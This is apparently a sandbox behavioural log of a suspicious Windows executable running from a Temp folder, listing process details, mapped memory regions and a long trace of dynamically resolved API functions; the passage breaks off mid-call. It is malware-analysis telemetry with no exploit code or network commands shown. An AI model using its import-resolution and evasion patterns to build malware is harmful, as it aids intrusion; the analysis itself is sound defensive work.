[0115.640] _get_osfhandle (_FileHandle=0) returned 0x3 [0115.640] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0115.640] SetConsoleInputExeNameW () returned 0x1 [0115.640] GetConsoleOutputCP () returned 0x1b5 [0115.640] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0115.640] SetThreadUILanguage (LangId=0x0) returned 0x409 [0115.640] exit (_Code=0) Process: id = "43" image_name = "bkm66byk.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe" page_root = "0x7ea16780" os_pid = "0xd80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "41" os_parent_pid = "0xd5c" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7216 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7217 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7218 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 7219 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7220 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7221 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7222 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7223 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 7224 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7225 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7226 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7227 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 7228 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 7229 start_va = 0x520000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 7230 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7231 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7232 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 7233 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7234 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7235 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7236 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7237 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7238 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7239 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7240 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7241 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 7242 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7243 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7244 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 7245 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7246 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7261 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7262 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 7263 start_va = 0x5f0000 end_va = 0x6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 7264 start_va = 0x700000 end_va = 0x12fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 7298 start_va = 0x1300000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 7299 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7300 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7301 start_va = 0x1440000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 7302 start_va = 0x1550000 end_va = 0x181efff entry_point = 0x1550000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7303 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 7304 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 7417 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x1d0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 7418 start_va = 0x1820000 end_va = 0x191ffff entry_point = 0x0 region_type = private name = "private_0x0000000001820000" filename = "" Region: id = 7419 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 7420 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7421 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 7422 start_va = 0x1440000 end_va = 0x14dffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 7423 start_va = 0x1510000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 7424 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 7425 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 7472 start_va = 0x1920000 end_va = 0x1a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001920000" filename = "" Region: id = 7473 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 7474 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 71 os_tid = 0xd84 [0112.606] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0112.606] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0112.606] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0112.606] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0112.607] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0112.608] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0112.609] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0112.610] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0112.610] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0112.610] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0112.610] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0112.610] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0112.678] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0112.679] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0112.679] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0112.679] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0112.680] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0112.681] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0112.682] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0112.682] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0112.682] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0112.682] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0112.682] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0112.683] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0112.683] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0112.683] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0112.683] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0112.683] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0112.684] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0112.684] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0112.684] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0112.684] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0112.684] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0112.684] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0112.684] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0112.684] GetProcAddress (hModule=0x76c10000, 